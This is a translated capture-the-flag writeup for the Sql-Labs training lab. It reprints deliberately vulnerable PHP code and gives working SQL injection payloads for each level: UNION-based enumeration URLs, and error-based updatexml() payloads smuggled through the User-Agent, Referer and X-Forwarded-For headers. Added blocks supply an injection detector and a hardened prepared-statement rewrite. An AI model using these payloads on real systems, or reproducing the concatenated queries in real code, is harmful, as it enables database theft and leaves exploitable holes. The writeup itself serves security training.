[封神台] Sql-Labs writeup
Posted on: 2021-8-5 13:44 1674



Single quotes are filtered, so the universal-password login no longer works. Looking at the source, the User-Agent header is embedded in the INSERT statement, which leaves two options: run sqlmap on the captured request with a * marker, or use Burp to find the password, log in, and put an updatexml() expression in the User-Agent so that the error for the statement in the UA is printed right on the page. The first approach is mindless, so I skip it.

The account is admin with password 123456. From the source, the statement that uses User-Agent only runs after a successful login, because $row must be non-empty; so to do error-based injection you first have to be able to log in.


length function:

This function is mainly used to measure string length; in blind injection it determines the length of the string currently being queried, such as the database name or a table name.

substr function:

Used to split a string into single characters, which are then tested one at a time together with their ASCII code to work out what each character is.

ascii function:

Returns the ASCII code of a character, turning characters into numbers; because numbers can be compared for size, greater-than/less-than comparisons narrow down the exact character quickly.


(1) if(condition, value returned when the condition holds, value returned when it does not)

(2) sleep(X): pause for X seconds
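The header-injection and blind-injection styles this writeup relies on (updatexml in User-Agent, Referer or X-Forwarded-For, length/substr/ascii comparisons, if/sleep delays) are easy to spot in request data once the application or a WAF inspects headers as well as form fields. The classifier below is an added example and not part of the original post; SIGNATURES, classify() and scan_request() are names chosen here, and the sample request is constructed from the payload shapes in the writeup.

```php
<?php
// Added example: classify request values by the injection style used in this writeup.
// Patterns are case-insensitive; a value can match several styles at once.
const SIGNATURES = [
    'error-based (updatexml/extractvalue)' => '/\b(updatexml|extractvalue)\s*\(/i',
    'union-based'                          => '/\bunion\b\s+(all\s+)?select\b/i',
    'time-based (sleep/benchmark)'         => '/\b(sleep|benchmark)\s*\(/i',
    'boolean-blind (length/substr/ascii)'  => '/\b(length|substr|substring|mid|ascii|ord)\s*\(/i',
    'schema enumeration'                   => '/\binformation_schema\./i',
];

function classify(string $value): array {
    $hits = [];
    foreach (SIGNATURES as $label => $re) {
        if (preg_match($re, $value) === 1) { $hits[] = $label; }
    }
    // concat(0x7e, ...) is the wrapper the writeup uses to make the error message readable
    if (preg_match('/concat\s*\(\s*0x7e/i', $value) === 1) {
        $hits[] = 'error-based marker (concat(0x7e,...))';
    }
    return $hits;
}

// The lab only filtered username/password, so User-Agent, Referer and X-Forwarded-For are
// exactly where such strings would appear; scan headers and parameters alike.
function scan_request(array $headers, array $params): array {
    $findings = [];
    foreach ($headers + $params as $name => $value) {
        $hits = classify((string)$value);
        if ($hits !== []) { $findings[$name] = $hits; }
    }
    return $findings;
}

// Constructed sample request modelled on the payloads in this writeup.
$findings = scan_request(
    ['User-Agent'      => "'or updatexml(1,concat(0x7e,user()),1),1)#",
     'Referer'         => 'https://example.com/page',
     'X-Forwarded-For' => '203.0.113.5'],
    ['id'       => "1' and if(ascii(substr(database(),1,1))>100,sleep(3),0)#",
     'username' => 'admin']
);
print_r($findings);   // User-Agent and id are flagged; Referer, X-Forwarded-For, username are clean
```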


$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id='.$id;
mysqli_select_db($conn,'****');// don't want you to know the database name
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){ 
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
 
 
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database();
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,group_concat(column_name) from f.columns where table_schema=database() and table_name=0x6572726f725f666c6167;
//0x6572726f725f666c6167 is the hex encoding of error_flag
http://inject2.lab.aqlab.cn:81/Pass-01/index.php?id=1 union all select 1,2,flag from error_flag;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=\''.$id.'\'';
mysqli_select_db($conn,'****');// don't want you to know the database name
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){ 
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-02/index.php?id=1' union all select 1,2,flag from error_flag %23;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=(\''.$id.'\')';
mysqli_select_db($conn,'****');// don't want you to know the database name
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){ 
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-03/index.php?id=1') union all select 1,2,flag from error_flag %23;
$username = '';
$password = '';
@$id = $_GET['id'];
@$sql = 'select *from user where id=("'.$id.'")';
mysqli_select_db($conn,'****');// don't want you to know the database name
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){ 
$username = $row['username'];
$password = $row['password'];
}
echo 'Your Login name:'.$username;
echo 'Your Password:'.$password;
http://inject2.lab.aqlab.cn:81/Pass-04/index.php?id=1") union all select 1,2,flag from error_flag %23;
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
mysqli_select_db($conn,'******'); // not telling you the database name
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
 
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,3 limit 1,1#
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() limit 1,1#
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag' limit 1,1#
username=admin&password=as4dsa2dsad2a3'  union all select 1,2,flag from flag limit 1,1#
$username = $_POST['username'];
$password = $_POST['password'];
$sql = 'select *from user where username =("'.$username.'") and password=("'.$password.'")';
mysqli_select_db($conn,'******'); // not telling you the database name
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
 
if($row){
echo '成功登录Your Login name:'.$uname.'Your Password:'.$passwd.'';}
else{echo '账号密码错误';}
username=admin&password=as4dsa2dsad2a3")  union all select 1,2,flag from flag limit 1,1#
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_USER_AGENT'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');// not telling you the database name
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO uagent (`uagent`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
} // closing brace missing from the posted excerpt
'or updatexml(1,concat(0x7e,user()),1),1)#
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1)),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='flag_head')),1),1)#
'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
$username = $_POST['username'];
$password = $_POST['password'];
$uagent = $_SERVER['HTTP_REFERER'];
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');// not telling you the database name
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO refer (`refer`,`username`) VALUES ('$uagent','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
} // closing brace missing from the posted excerpt
Referer: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
function getip()
{
    // every branch except the last reads a client-supplied request header
    if (getenv('HTTP_CLIENT_IP'))
    {
        $ip = getenv('HTTP_CLIENT_IP');
    }
    elseif (getenv('HTTP_X_FORWARDED_FOR'))
    {
        $ip = getenv('HTTP_X_FORWARDED_FOR');
    }
    elseif (getenv('HTTP_X_FORWARDED'))
    {
        $ip = getenv('HTTP_X_FORWARDED');
    }
    elseif (getenv('HTTP_FORWARDED_FOR'))
    {
        $ip = getenv('HTTP_FORWARDED_FOR');
    }
    elseif (getenv('HTTP_FORWARDED'))
    {
        $ip = getenv('HTTP_FORWARDED');
    }
    else
    {
        $ip = $_SERVER['REMOTE_ADDR'];
    }
    return $ip;
}
$username = $_POST['username'];
$password = $_POST['password'];
$ip = getip();
$jc = $username.$password;
$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
if(preg_match('/.*\'.*/',$jc)!== 0){die('为了网站安全性,禁止输入某些特定符号');}
mysqli_select_db($conn,'****');// not telling you the database name
$result = mysqli_query($conn,$sql);
$row = mysqli_fetch_array($result);
$uname = $row['username'];
$passwd = $row['password'];
if($row){
$Insql = "INSERT INTO ip (`ip`,`username`) VALUES ('$ip','$uname')";
$result1 = mysqli_query($conn,$Insql);
print_r(mysqli_error($conn));
echo '成功登录';
} // closing brace missing from the posted excerpt
X-FORWARDED-FOR: 'or updatexml(1,concat(0x7e,(select group_concat(flag_h1) from flag_head)),1),1)#
$news ='';
@$id = $_GET['id'];
@$sql = 'select *from news where id='.$id;
mysqli_select_db($conn,'****');// don't want you to know the database name
$result = mysqli_query($conn,$sql);
while ($row = mysqli_fetch_array($result)){ 
$news = $row['news'];
}
if($news!== ''){
echo '有数据';}
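A hardened counterpart to the lab code in this post (the numeric id lookup, the login form, and the User-Agent/Referer/IP logging), added here as an example and not part of the original post or the lab. It assumes a mysqli connection $conn with the database selected and mysqlnd available, that the stored password column has been rehashed with password_hash(), and a single log table uagent(uagent, ip, username) instead of the lab's three; fetch_news(), client_ip() and login() are names chosen for this example.

```php
<?php
// Hardened counterpart to the lab code (example only). Assumes $conn is a mysqli
// connection with the database selected; failures throw instead of being echoed.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);

// Pass-01 / news-style numeric id: validate, then bind as an integer instead of
// concatenating $_GET['id'] into the query text.
function fetch_news(mysqli $conn, string $rawId): ?string {
    if (!ctype_digit($rawId)) { return null; }      // reject anything but a plain integer
    $stmt = $conn->prepare('SELECT news FROM news WHERE id = ?');
    $stmt->bind_param('i', $rawId);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();      // get_result() needs mysqlnd
    return $row['news'] ?? null;
}

// Client address: REMOTE_ADDR is set by the server; HTTP_CLIENT_IP, X-Forwarded-For and the
// other headers getip() trusted are attacker-controlled, so they are only honoured when the
// request came from a proxy we operate, and even then the value must parse as an IP.
function client_ip(array $server, array $trustedProxies = []): string {
    $remote = $server['REMOTE_ADDR'] ?? '';
    if (in_array($remote, $trustedProxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        $first = trim(explode(',', $server['HTTP_X_FORWARDED_FOR'])[0]);
        if (filter_var($first, FILTER_VALIDATE_IP) !== false) { return $first; }
    }
    return $remote;
}

// Login: username and password are bound parameters, so the quote filter on $jc is no
// longer needed and quotes in the password are harmless. Assumes the stored password
// column was rehashed with password_hash() (the lab stores 123456 in clear).
function login(mysqli $conn, string $username, string $password, array $server): bool {
    $stmt = $conn->prepare('SELECT username, password FROM user WHERE username = ?');
    $stmt->bind_param('s', $username);
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    if ($row === null || !password_verify($password, $row['password'])) { return false; }
    // Header values go in as bound parameters too, truncated to the column width, so an
    // updatexml() payload in User-Agent or X-Forwarded-For is stored as inert text.
    // Assumes one log table uagent(uagent, ip, username) instead of the lab's three.
    $uagent = substr($server['HTTP_USER_AGENT'] ?? '', 0, 255);
    $ip     = client_ip($server, ['10.0.0.2']);     // '10.0.0.2' stands in for your own proxy
    $uname  = $row['username'];
    $ins = $conn->prepare('INSERT INTO uagent (uagent, ip, username) VALUES (?, ?, ?)');
    $ins->bind_param('sss', $uagent, $ip, $uname);
    $ins->execute();                                // on failure this throws; log it server-side,
    return true;                                    // never print mysqli_error() to the client
}
```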
length(string)
SUBSTR(string, start position, number of characters)
ascii(character)

Last edited by 孤桜懶契 on 2021-8-5 13:46, reason: